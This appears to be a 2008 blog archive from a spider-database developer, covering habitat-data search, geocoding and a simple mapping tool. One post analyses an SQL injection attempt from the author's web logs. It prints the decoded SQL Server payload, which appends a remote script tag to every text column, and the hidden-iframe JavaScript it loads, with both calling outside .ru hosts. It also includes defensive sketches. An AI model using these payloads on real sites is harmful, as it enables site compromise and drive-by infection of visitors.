Friday, July 25, 2008

Show Me...Crab Spiders on Bark



One of the DarwinCore elements for specimen and observation data is "habitat". To my knowledge, not a lot has been done with these data. Either few records cached at GBIF actually have this field filled, or the data are in such a mess as to be (mostly) unusable. I certainly hope it's not the latter. No matter how messy, there is still a wealth of information here if one takes the time to sift through it. The data are not unlike folksonomies, and someone with more patience than me could probably develop a natural classification of these terms.

Faceted search is a first crack at making these data useful, because using them certainly opens more trajectories into the data than ignoring them. For a first cut at this, I pulled 30 random contributed specimen records in the Nearctic Spider Database for each species and merely displayed the full contents on the species pages. Then, I indexed the pages as always using my trusty Zoom Search. Voila, a quick way to do some faceted searches. It's not perfect, but it's better than nothing. Where "crab spider bark" or "wolf spider beach" once produced no search results, there are now 5 and 17 results returned, respectively. Incidentally, Flickr produced 13 and 18 results, respectively, but many of the images are useless.

Sunday, July 20, 2008

Green Porno

I couldn't resist sharing these. Pure genius. Kudos to Isabella Rossellini.

SQL Injection Attacks!

I was browsing through my web logs this morning and discovered some clever attempts to hack into my database using a technique called SQL injection. Here's a portion of one line in the web log:

/data/canada_spiders/AllReferences.asp Letter=F;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C...more crap here...4445414C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);--

The semicolon after "Letter=F" above is an attempt to mark the close of the SQL within the page "/data/canada_spiders/AllReferences.asp" and everything else after it is crap that could be executed on the server. Had I constructed my SQL on the page to be something like:
SELECT * FROM [TABLE] WHERE [COLUMN] = "" & [LETTER F] & ""

...where [LETTER F] is the parameter passed from the URL, I would have exposed myself to something potentially serious. So, instead of:
SELECT * FROM [TABLE] WHERE [COLUMN] = "F"

...the executed SQL would have been:
SELECT * FROM [TABLE] WHERE [COLUMN] = "F";DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C...more crap here...4445414C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);--

Cool.
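For contrast, here is a minimal sketch of the safer pattern, a parameterized query, where the value from the URL is bound as data and never pasted into the SQL text. It is written in Python with the standard-library sqlite3 module purely as a stand-in; the page above is ASP against SQL Server, and the table name `refs`, its columns, and the function `references_by_letter` are all made up for illustration.

```python
import sqlite3


def references_by_letter(conn, letter):
    """Return titles whose first_letter equals `letter`.

    The ? placeholder makes the driver bind `letter` strictly as a value,
    so a semicolon or trailing SQL in it is never parsed as a statement.
    """
    cur = conn.execute(
        "SELECT title FROM refs WHERE first_letter = ? ORDER BY title",
        (letter,),
    )
    return [row[0] for row in cur.fetchall()]


# Hypothetical in-memory table standing in for the real references table.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE refs (first_letter TEXT, title TEXT)")
conn.executemany(
    "INSERT INTO refs VALUES (?, ?)",
    [
        ("F", "Example reference F1"),
        ("F", "Example reference F2"),
        ("G", "Example reference G1"),
    ],
)

# A normal request, then one shaped like the attack in the web log.
print(references_by_letter(conn, "F"))
print(references_by_letter(conn, "F;DECLARE @S VARCHAR(4000);EXEC(@S);--"))
```

With binding, the attack string is simply compared against the column as one odd-looking letter, matches nothing, and the table is left alone.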

So, just what is all that crap? Well, it's a SQL Server-specific bit of code that is HEX-encoded. The full decoded HEX is as follows:
DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name FROM sysobjects a,syscolumns b
WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
BEGIN
EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://www.bnrc.ru/ngg.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
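If you want to decode such a payload yourself, something like the following Python sketch should do it. It only decodes the two fragments that appear in the log line above (the middle of the payload is elided there, so it is left out here too), and the helper name `decode_hex_payload` is my own invention.

```python
def decode_hex_payload(hex_text):
    """Turn a SQL Server style hex literal (optionally 0x-prefixed) into text."""
    if hex_text.lower().startswith("0x"):
        hex_text = hex_text[2:]
    # Each pair of hex digits is one byte; the payload here is plain ASCII.
    return bytes.fromhex(hex_text).decode("ascii")


# The leading and trailing fragments copied from the web log entry.
head = "0x4445434C415245204054205641524348415228323535292C"
tail = "4445414C4C4F43415445205461626C655F437572736F7220"

print(repr(decode_hex_payload(head)))  # 'DECLARE @T VARCHAR(255),'
print(repr(decode_hex_payload(tail)))  # 'DEALLOCATE Table_Cursor '
```

The two fragments line up with the first and last lines of the decoded SQL shown above.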

Hmm. What does this mean? Well, it's an attempt to do something very scary - walk through every text-type column (text, ntext, varchar and nvarchar) in every user table and append a reference to a snippet of JavaScript to every value. So, the next time any data are pulled from the database for presentation on a website, there is the potential to include hundreds of references to a remote JavaScript file.

So, what's in the JavaScript? This:
window.status="";
var cookieString = document.cookie;
var start = cookieString.indexOf("dssndd=");
if (start != -1){}else{
var expires = new Date();
expires.setTime(expires.getTime()+9*3600*1000);
document.cookie = "dssndd=update;expires="+expires.toGMTString();
try{
document.write("<iframe src=http://iogp.ru/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>");
}
catch(e)
{
};
}

OK, so an iframe is inserted. Cripes, will it ever end? What's in the iframe? A page with some obfuscated JavaScript that runs when the page is rendered. This is as far as I got. But others have also discovered this and note that the JavaScript in that iframe is at least a redirect to msn.com. If you conduct a search for "ngg.js", you can pull up a whole heap of sites indexed by Google that have apparently been hit by this SQL injection attack. So, if you visit a web site, click a link and get mysteriously redirected to msn.com, something may have just happened to your browser.

But, I still have no idea what the ultimate end game is. What the heck is in the obfuscated JavaScript in the iframe? Anyone?

Saturday, July 19, 2008

Google Geocodes

Since I have been on a kick this weekend getting back into the mapping thing, I decided to see what was new in the world of the Google Map API and discovered plenty of new great things. For example, folks have developed reverse geocoders. It's a shame however that the full ISO country names aren't used. Rather, only the country codes are made available via Google's geocode API. I would have much rather had the full country name and the full "AdministrativeAreaName" (i.e. the State or Province in Google Map API parlance) because I could then use this in the AJAX data grid for contributors of specimen records to the Nearctic Spider Database. Similarly, applications like Specify could have taken advantage of this to help users clean or check their data as these are entered.

Nevertheless, I tweaked my old Google Map Geocoder to take advantage of all these advancements. The point of this little gadget is to click a map and get the location and coordinates. In this era of GPS units and iPhones, this may be rather pointless. But it was fun to see what I could do in an hour or so.

Friday, July 18, 2008

Simple Mapper

With the recent mapping craze this past decade and the fascination with AJAX tiling, a serious deficiency has been a simple mechanism to produce a black & white line map with points to mark collection locations for use in an outgoing manuscript. While at the recent American Arachnological Society meetings at Berkeley, California, I casually mentioned in a presentation I gave about the Nearctic Spider Database that someone should make such a service. Well, I made one...at least the start of one, right HERE.

I know, I know, yet another mapping service. But, this one serves a very specific purpose. It could no doubt be expanded and made more customizable, with different points for multiple species (a bit tougher) and an option to use a global map instead (trivial), but it's a start to producing something that hopefully satisfies a very different need.